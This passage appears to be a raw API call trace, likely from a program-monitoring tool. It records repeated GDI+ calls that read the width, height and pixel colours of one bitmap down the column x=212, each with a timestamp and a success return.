y=93, color=0x18e3d0) returned 0x0 [0275.491] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.491] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.491] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=94, color=0x18e3d0) returned 0x0 [0275.492] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.492] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.492] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=95, color=0x18e3d0) returned 0x0 [0275.492] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.492] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.492] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=96, color=0x18e3d0) returned 0x0 [0275.492] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.492] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.492] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=97, color=0x18e3d0) returned 0x0 [0275.492] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.492] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.493] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=98, color=0x18e3d0) returned 0x0 [0275.493] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.493] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.493] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=99, color=0x18e3d0) returned 0x0 [0275.493] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.493] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.493] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=100, color=0x18e3d0) returned 0x0 [0275.493] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.493] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.493] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=101, color=0x18e3d0) returned 0x0 [0275.493] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.493] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.494] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=102, color=0x18e3d0) returned 0x0 [0275.494] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.494] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.494] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=103, color=0x18e3d0) returned 0x0 [0275.494] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.494] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.494] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=104, color=0x18e3d0) returned 0x0 [0275.494] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.494] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.494] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=105, color=0x18e3d0) returned 0x0 [0275.494] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.494] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.495] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=106, color=0x18e3d0) returned 0x0 [0275.495] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.495] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.495] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=107, color=0x18e3d0) returned 0x0 [0275.495] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.495] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.495] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=108, color=0x18e3d0) returned 0x0 [0275.495] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.495] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.495] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=109, color=0x18e3d0) returned 0x0 [0275.495] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.495] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.496] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=110, color=0x18e3d0) returned 0x0 [0275.496] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.496] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.496] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=111, color=0x18e3d0) returned 0x0 [0275.496] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.496] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.496] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=112, color=0x18e3d0) returned 0x0 [0275.496] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.496] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.496] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=113, color=0x18e3d0) returned 0x0 [0275.496] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.496] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.496] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=114, color=0x18e3d0) returned 0x0 [0275.497] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.497] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.497] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=115, color=0x18e3d0) returned 0x0 [0275.497] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.497] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.497] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=116, color=0x18e3d0) returned 0x0 [0275.497] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.497] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.497] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=117, color=0x18e3d0) returned 0x0 [0275.497] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.497] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.497] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=118, color=0x18e3d0) returned 0x0 [0275.497] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.497] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.497] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=119, color=0x18e3d0) returned 0x0 [0275.498] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.498] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.498] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=120, color=0x18e3d0) returned 0x0 [0275.498] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.498] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.498] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=121, color=0x18e3d0) returned 0x0 [0275.498] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.498] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.498] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=122, color=0x18e3d0) returned 0x0 [0275.498] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.498] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.498] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=123, color=0x18e3d0) returned 0x0 [0275.498] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.498] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.499] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=124, color=0x18e3d0) returned 0x0 [0275.499] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.499] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.499] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=125, color=0x18e3d0) returned 0x0 [0275.499] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.499] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.499] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=126, color=0x18e3d0) returned 0x0 [0275.499] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.499] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.499] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=127, color=0x18e3d0) returned 0x0 [0275.499] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.499] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.499] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=128, color=0x18e3d0) returned 0x0 [0275.499] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.500] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.500] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=129, color=0x18e3d0) returned 0x0 [0275.500] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.500] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.500] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=130, color=0x18e3d0) returned 0x0 [0275.500] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.500] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.500] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=131, color=0x18e3d0) returned 0x0 [0275.500] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.500] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.500] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=132, color=0x18e3d0) returned 0x0 [0275.500] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.500] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.500] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=133, color=0x18e3d0) returned 0x0 [0275.501] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.501] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.501] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=134, color=0x18e3d0) returned 0x0 [0275.501] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.501] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.501] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=135, color=0x18e3d0) returned 0x0 [0275.501] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.501] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.501] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=136, color=0x18e3d0) returned 0x0 [0275.501] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.501] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.501] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=137, color=0x18e3d0) returned 0x0 [0275.501] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.501] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.501] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=138, color=0x18e3d0) returned 0x0 [0275.502] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.502] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.502] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=139, color=0x18e3d0) returned 0x0 [0275.502] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.502] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.502] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=140, color=0x18e3d0) returned 0x0 [0275.502] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.502] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.502] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=141, color=0x18e3d0) returned 0x0 [0275.502] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.502] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.638] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=142, color=0x18e3d0) returned 0x0 [0275.638] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.638] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.638] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=143, color=0x18e3d0) returned 0x0 [0275.638] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.639] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.639] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=144, color=0x18e3d0) returned 0x0 [0275.639] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.639] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.639] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=145, color=0x18e3d0) returned 0x0 [0275.639] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.639] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.639] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=146, color=0x18e3d0) returned 0x0 [0275.639] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.639] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.639] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=147, color=0x18e3d0) returned 0x0 [0275.639] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.639] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.639] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=148, color=0x18e3d0) returned 0x0 [0275.640] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.640] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.640] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=149, color=0x18e3d0) returned 0x0 [0275.796] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.796] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.796] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=150, color=0x18e3d0) returned 0x0 [0275.796] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=151, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=152, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=153, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=154, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=155, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.797] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.797] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=156, color=0x18e3d0) returned 0x0 [0275.797] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=157, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=158, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=159, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=160, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=161, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.798] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.798] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=162, color=0x18e3d0) returned 0x0 [0275.798] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.799] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.799] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=163, color=0x18e3d0) returned 0x0 [0275.799] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.799] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.799] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=164, color=0x18e3d0) returned 0x0 [0275.799] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.799] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.799] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=165, color=0x18e3d0) returned 0x0 [0275.799] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.799] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.799] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=166, color=0x18e3d0) returned 0x0 [0275.799] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.801] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=167, color=0x18e3d0) returned 0x0 [0275.801] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.801] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=168, color=0x18e3d0) returned 0x0 [0275.801] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.801] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=169, color=0x18e3d0) returned 0x0 [0275.801] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.801] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=170, color=0x18e3d0) returned 0x0 [0275.801] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.801] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=171, color=0x18e3d0) returned 0x0 [0275.801] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.801] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=172, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=173, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=174, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=175, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=176, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.802] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=177, color=0x18e3d0) returned 0x0 [0275.802] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.802] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=178, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=179, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=180, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=181, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=182, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=183, color=0x18e3d0) returned 0x0 [0275.803] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.803] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.803] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=184, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=185, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=186, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=187, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=188, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=189, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.804] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.804] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=190, color=0x18e3d0) returned 0x0 [0275.804] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=191, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=192, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=193, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=194, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=195, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.805] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.805] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=196, color=0x18e3d0) returned 0x0 [0275.805] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 